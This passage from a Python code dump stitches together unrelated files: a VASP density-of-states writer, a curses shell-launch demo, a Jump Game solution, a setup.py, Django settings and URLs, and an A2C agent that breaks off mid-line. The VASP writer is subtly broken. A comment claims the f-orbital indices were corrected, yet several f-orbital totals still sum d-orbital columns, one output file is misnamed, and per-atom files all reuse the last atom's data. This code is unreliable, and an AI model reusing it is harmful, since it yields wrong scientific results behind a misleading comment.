units)')\n #plt.ylim((-6, 6))\n plt.xlabel('Energy (eV)')\n #plt.xlim((-5, 6))\n plt.xlabel('Energy (eV)')\n pdf.savefig() \n #plt.show()\n plt.close()\n\n\n# In[5]:\n\n\n###Writing data to files\n\ndef writeTDOS(fName,totaldos,nBins):\n fileName=fName+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e} {2:12.4e}'.format(totaldos[0,i]-eFermi,totaldos[1,i],-totaldos[2,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".dos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(totaldos[0,i]-eFermi,totaldos[1,i]+totaldos[2,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n\ndef writeDOS(fName,totaldos,nBins):\n \n #sssssssssssssssssssssssssssssssss\n fileName=fName+\".01-s.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[1,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".02-s.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[2,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".33-s.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[1,i]+dos[2,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n \n #pxpxpxpxpxpxpxpxpxpxpxpxpxpxpxpxpxpxpx\n fileName=fName+\".03-px.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[3,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".04-px.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[4,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".34-px.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[3,i]+dos[4,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #pypypypypypypypypypypypypypypypypypypy\n fileName=fName+\".05-py.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[5,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".06-py.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[6,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".35-py.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[5,i]+dos[6,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #pzpzpzpzpzpzpzpzpzpzpzpzpzpzpzpzpzpzpz\n fileName=fName+\".07-pz.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[7,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".08-pz.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[8,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".36-pz.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} 
{1:12.4e}'.format(dos[0,i]-eFermi,dos[7,i]+dos[8,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #ppppppppppppppppppppppppppppppppppppppp\n fileName=fName+\".37-p.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[3,i]+dos[5,i]+dos[7,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".38-p.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[4,i]-dos[6,i]-dos[8,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".39-p.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[3,i]+dos[4,i]+dos[5,i]+dos[6,i]+dos[7,i]+dos[8,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n\n #dxydxydxydxydxydxydxydxydxydxydxydxydxy\n fileName=fName+\".09-dxy.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[9,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".10-dxy.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[10,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".40-dxy.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[9,i]+dos[10,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #dyzdyzdyzdyzdyzdyzdyzdyzdyzdyzdyzdyzdyz\n fileName=fName+\".11-dyz.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[11,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".12-dyz.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[12,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".41-dyz.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[11,i]+dos[12,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #dzxdzxdzxdzxdzxdzxdzxdzxdzxdzxdzxdzxdzx\n fileName=fName+\".13-dzx.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[13,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".14-dzx.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[14,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".42-dzx.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[13,i]+dos[14,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #dx2y2dx2y2dx2y2dx2y2dx2y2dx2y2dx2y2dx2y2\n fileName=fName+\".15-dx2y2.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[15,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".16-dx2y2.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[16,i])+\"\\n\"\n 
fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".43-dx2y2.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[15,i]+dos[16,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #dz2dz2dz2dz2dz2dz2dz2dz2dz2dz2dz2dz2dz2dz2\n fileName=fName+\".17-dz2.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[17,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".18-dz2.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[18,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".44-dz2.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[17,i]+dos[18,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #dddddddddddddddddddddddddddddddddddddddddddd\n fileName=fName+\".45-d.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[ 9,i]+dos[11,i]+dos[13,i]+dos[15,i]+dos[17,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".46-d.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[10,i]-dos[12,i]-dos[14,i]-dos[16,i]-dos[18,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".47-d.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[ 9,i]+dos[10,i]+dos[11,i]+dos[12,i]+dos[13,i]+dos[14,i]+dos[15,i]+dos[16,i]+dos[17,i]+dos[18,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #f-3 ##the f .tot/.up/.dn sums below previously reused d-column indices from copy-paste; corrected to the f columns (19-32)\n fileName=fName+\".19-f-3.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[19,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".20-f-3.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[20,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".48-f-3.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[19,i]+dos[20,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #f-2\n fileName=fName+\".21-f-2.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[21,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".22-f-2.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[22,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".49-f-2.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[21,i]+dos[22,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #f-1\n fileName=fName+\".23-f-1.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[23,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n 
fileName=fName+\".24-f-1.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[24,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".50-f-1.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[13,i]+dos[14,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #f0\n fileName=fName+\".25-f0.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[25,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".26-f0.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[26,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".51-f0.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[15,i]+dos[16,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #f1\n fileName=fName+\".27-f1.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[27,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".28-f1.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[28,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".52-f1.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[17,i]+dos[18,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #f2\n fileName=fName+\".29-f2.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[29,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".30-f2.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[30,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".f3-f2.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[17,i]+dos[18,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #f3\n fileName=fName+\".31-f3.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[31,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".32-f3.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[32,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".54-f3.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[17,i]+dos[18,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #f-total\n fileName=fName+\".55-f.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[ 9,i]+dos[11,i]+dos[13,i]+dos[15,i]+dos[17,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".56-f.dn\"+\".ldos\"+\".dat\"\n 
fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[20,i]-dos[22,i]-dos[24,i]-dos[26,i]-dos[28,i]-dos[30,i]-dos[32,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".57-f.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[19,i]+dos[20,i]+dos[21,i]+dos[22,i]+dos[23,i]+dos[24,i]+dos[25,i]+dos[26,i]+dos[27,i]+dos[28,i]+dos[29,i]+dos[30,i]+dos[31,i]+dos[32,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n\n #atomatomatomatomatomatomatomatomatomatomatom  ##note: the per-atom totals below sum s+p+d only\n fileName=fName+\".58-up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[1,i]+dos[3,i]+dos[5,i]+dos[7,i]+dos[ 9,i]+dos[11,i]+dos[13,i]+dos[15,i]+dos[17,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".59-dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[2,i]-dos[4,i]-dos[6,i]-dos[8,i]-dos[10,i]-dos[12,i]-dos[14,i]-dos[16,i]-dos[18,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".60-tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[1,i]+dos[2,i]+dos[3,i]+dos[4,i]+dos[ 5,i]+dos[6,i]+dos[7,i]+dos[8,i]+dos[9,i]+dos[10,i]+dos[11,i]+dos[12,i]+dos[13,i]+dos[14,i]+dos[15,i]+dos[16,i]+dos[17,i]+dos[18,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n \nfor i in range(nAtm):\n if (i==0) :\n fName=OUTDIR+\"/\"+\"000.total\"\n writeTDOS(fName,totaldos,nBins)\n fName=OUTDIR+\"/\"+str('{0:03d}'.format(i+1))+str(system.get_chemical_symbols()[i])\n writeDOS(fName,dos,nBins) ##caution: dos still holds the last atom parsed in the plotting loop above, so every per-atom file is written from that atom's data\n\n\n# In[6]:\n\n\nprint(\"done\")\n\n\n# In[ ]:\n","sub_path":"VASP_LDOS.py","file_name":"VASP_LDOS.py","file_ext":"py","file_size_in_byte":27078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"529610028","text":"import curses\nimport subprocess\nimport os\n\n# Create a screen and print hello\nscreen = curses.initscr()\nscreen.addstr(\"Hello! 
Dropping you into a command prompt...\\n\")\nprint(\"Program initialized...\")\nscreen.refresh()\nscreen.getkey()\n\n# Hide the screen, show original terminal, restore cursor position\ncurses.endwin()\n\n# Update screen in background\nscreen.addstr(\"I'll be waiting for you when you return.\\n\")\n\n# Drop the user in a command prompt\nprint(\"About to open command prompt...\")\nscreen.getkey()\n\nif os.name == \"nt\":\n shell = \"pwsh.exe\"\nelse:\n shell = \"bash\"\n\nsubprocess.call(shell)\n\n# When the subprocess ends, return to our screen.\n# also restoring cursor position\nscreen.refresh()\nscreen.getkey()\n\n# Finally go back to the terminal for real\ncurses.endwin()\n","sub_path":"shell_out_example.py","file_name":"shell_out_example.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"490098991","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 24 23:18:42 2019\r\n\r\n@author: binxi\r\n\"\"\"\r\n\r\nclass Solution(object):\r\n    def canJump(self, nums):\r\n        \"\"\"\r\n        :type nums: List[int]\r\n        :rtype: bool\r\n        \"\"\"\r\n        jumpable = [False]*len(nums)\r\n        jumpable[0] = True\r\n        latest = 0\r\n        \r\n        for i in range(0,len(nums),1):\r\n            if jumpable[i]:\r\n                x = i+nums[i]\r\n                if x>= len(nums)-1:\r\n                    return True\r\n                elif x > latest:\r\n                    for j in range(latest+1,min(x+1,len(nums)),1):\r\n                        jumpable[j] = True\r\n                    latest = x\r\n            else:\r\n                break\r\n        \r\n        return jumpable[-1]","sub_path":"Leetcode/#55 Jump Game.py","file_name":"#55 Jump Game.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"418024460","text":"from setuptools import setup\n\nNAME = \"partb\"\nVERSION = \"0.4.0\"\nDESCRIPTION = \"Predictive Analytics for Readmission: a Toolbox in Python\"\nKEYWORDS = \"Predictive Data Analytics Readmission Toolbox\"\nAUTHOR = \"Arkaitz Artetxe\"\nAUTHOR_EMAIL = \"aartetxe@vicomtech.org\"\nURL = \"https://github.com/aartetxe/par-toolbox\"\n\nsetup(\n    name=NAME,\n    version=VERSION,\n    description=DESCRIPTION,\n    keywords=KEYWORDS,\n    author=AUTHOR,\n    author_email=AUTHOR_EMAIL,\n    url=URL,\n    packages=['partb', 'partb.classification', 'partb.visualization', 'partb.descriptive', 'partb.utility'],\n    install_requires=['numpy', 'sklearn', 'scipy', 'matplotlib', 'seaborn', 'pandas', 'imblearn']\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"500013189","text":"import os\nfrom .base import BASE_DIR\n\nAWS_ACCESS_KEY_ID = os.getenv('AWS_ACCESS_KEY_ID')\nAWS_SECRET_ACCESS_KEY = os.getenv('AWS_SECRET_ACCESS_KEY')\nAWS_STORAGE_BUCKET_NAME = os.getenv('AWS_STORAGE_BUCKET_NAME')\nAWS_S3_CUSTOM_DOMAIN = '%s.s3.amazonaws.com' % AWS_STORAGE_BUCKET_NAME\nAWS_S3_OBJECT_PARAMETERS = {\n    'CacheControl': 'max-age=86400',\n}\nAWS_LOCATION = 'static'\nAWS_DEFAULT_ACL = None\n\nSTATICFILES_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'\nDEFAULT_FILE_STORAGE = 'gtszrcp.settings.storage_backends.MediaStorage'\n\nif int(os.getenv('DJANGO_DEBUG', 1)) == 1:\n    AWS_LOCATION = 'dev-static'\n\nSTATIC_URL = \"https://%s/%s/\" % (AWS_S3_CUSTOM_DOMAIN, 
AWS_LOCATION)","sub_path":"app/gtszrcp/settings/static_settings.py","file_name":"static_settings.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"654064486","text":"\"\"\"example_project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom app.views import IndexView, FromageView, CreateCheeseView, FromageDetailView\nfrom cheeseapi.views import FromageAPIView, FromageDetailAPIView\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n url(r'^$',IndexView.as_view(), name='index_view'),\n url(r'^cheese$',FromageView.as_view(), name=\"fromage_view\"),\n url(r'^cheese/(?P<pk>\\d+)$', FromageDetailView.as_view(), name=\"cheese_detail_view\"),\n url(r'^addcheese/$', CreateCheeseView.as_view(), name=\"create_cheese_view\"),\n url(r'^api/cheese/$', FromageAPIView.as_view(), name=\"fromage_api_view\"),\n url(r'^api/cheese/(?P<pk>\\d+)/$', FromageDetailAPIView.as_view(), name=\"fromage_detail_api_view\")\n]\n","sub_path":"example_project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"314105255","text":"\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport random\r\n\r\n\r\nclass A2CAgent():\r\n\r\n def __init__(self, name, is_train_model, sess, input_shape, action_size, lr, GAMMA, LAMBDA, max_grad_norm, ent_coef, vf_coef, clip_range, loadModel):\r\n self.sess = sess\r\n self.input_shape = input_shape\r\n self.action_size = action_size\r\n self.lr = lr\r\n self.GAMMA = GAMMA\r\n self.LAMBDA = LAMBDA\r\n self.max_grad_norm = max_grad_norm\r\n self.ent_coef = ent_coef\r\n self.vf_coef = vf_coef\r\n self.name = name\r\n self.is_train_model = is_train_model\r\n self.clip_range = clip_range\r\n\r\n self.state = tf.placeholder(tf.uint8, shape=(\r\n None, *self.input_shape), name=\"state\")\r\n self.actions = tf.placeholder(tf.uint8, shape=(None,), name=\"actions\")\r\n self.rewards = tf.placeholder(\r\n tf.float32, shape=(None,), name=\"rewards\")\r\n self.advantages = tf.placeholder(\r\n tf.float32, shape=(None,), name=\"advantages\")\r\n\r\n self.old_policy = tf.placeholder(tf.float32, shape=(\r\n None, self.action_size), name=\"old_policy\")\r\n self.old_values = tf.placeholder(\r\n tf.float32, shape=(None,), name=\"old_values\")\r\n\r\n self.episode_rewards = tf.placeholder(\r\n tf.float32, shape=(), name=\"episode_rewards\")\r\n self.max_episode_rewards = tf.placeholder(\r\n tf.float32, shape=(), name=\"max_episode_rewards\")\r\n\r\n with tf.variable_scope(self.name, reuse=tf.AUTO_REUSE):\r\n self.x_conv = tf.cast(self.state, tf.float32) / 255.0\r\n self.conv1 = tf.layers.conv2d(inputs=self.x_conv, filters=32, 
kernel_size=[8, 8], strides=(\r\n 4, 4), activation=tf.nn.relu, kernel_initializer=tf.contrib.layers.xavier_initializer_conv2d())\r\n self.conv2 = tf.layers.conv2d(inputs=self.conv1, filters=64, kernel_size=[4, 4], strides=(\r\n 2, 2), activation=tf.nn.relu, kernel_initializer=tf.contrib.layers.xavier_initializer_conv2d())\r\n self.conv3 = tf.layers.conv2d(inputs=self.conv2, filters=64, kernel_size=[3, 3], strides=(\r\n 1, 1), activation=tf.nn.relu, kernel_initializer=tf.contrib.layers.xavier_initializer_conv2d())\r\n\r\n self.conv_out = tf.contrib.layers.flatten(self.conv3)\r\n self.shared_dense = tf.layers.dense(\r\n self.conv_out, 512, activation=tf.nn.relu, kernel_initializer=tf.contrib.layers.xavier_initializer())\r\n\r\n self.policy_logits = tf.layers.dense(\r\n self.shared_dense, self.action_size, kernel_initializer=tf.contrib.layers.xavier_initializer())\r\n self.policy = tf.nn.softmax(self.policy_logits)\r\n\r\n self.values = tf.layers.dense(\r\n self.shared_dense, 1, kernel_initializer=tf.contrib.layers.xavier_initializer())\r\n self.local_vars = tf.trainable_variables()\r\n self.saver = tf.train.Saver(\r\n var_list=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES))\r\n\r\n if is_train_model:\r\n with tf.name_scope(\"{}_gradient\".format(self.name)):\r\n cliped_values = self.old_values + \\\r\n tf.clip_by_value(\r\n self.values - self.old_values, -self.clip_range, self.clip_range)\r\n \r\n value_loss1 = tf.square(tf.squeeze(self.values) - 